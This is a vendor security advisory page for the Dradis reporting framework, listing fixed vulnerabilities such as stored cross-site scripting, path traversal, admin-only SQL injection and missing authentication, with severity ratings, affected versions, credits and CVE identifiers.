Security Reports

This page lists all security vulnerabilities fixed in released versions of Dradis. Each vulnerability is given a security impact rating by the Dradis core team - please note that this rating may vary from platform to platform. We also list the versions of Dradis the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please send comments or corrections for these vulnerabilities to: security[ {at} ]dradisframework{ [dot] }org

Fixed in Dradis 3.7.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around Comment textareas input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

low: Authenticated (admin) persistent cross-site scripting

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

Fixed in Dradis 3.6.0

high: Authenticated (author) information disclosure

An author with an active session who is disabled by admins may continue to operate within the application

Affects: Pro 3.5.1 and possibly older versions of Dradis.

medium: Authenticated (admin) data modification

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

Fixed in Dradis 3.5.0

high: Authenticated (author) information disclosure

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette

medium: Authenticated (author) information disclosure

Mentioning a user in a comment, which does not have access to the project, could result in disclosure of content from future comments in the same thread.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Fixed in Dradis 3.4.1

high: Authenticated (author) path traversal vulnerability

Uploading a malicious zip file it is possible to place files in undesired locations on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.

medium: Authenticated (author) information disclosure

Information from other projects could be disclosed to other users in the system that happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

low: Authenticated (admin) SQL Injection

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.4 to 3.2.

Fixed in Dradis 3.2.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

medium: Authenticated persistent cross-site scripting

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

Fixed in Dradis 3.11.1

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

Fixed in Dradis 3.10.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

Fixed in Dradis 3.6.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.X and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

Fixed in Dradis 3.1.0.rc2

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda

Fixed in Dradis 2.5.2

high: Unauthenticated reflected cross-site scripting

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet

Fixed in Dradis 2.0.1

high: Missing authentication

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598

Affects: 2.0.0

CVE-2009-0670 (candidate)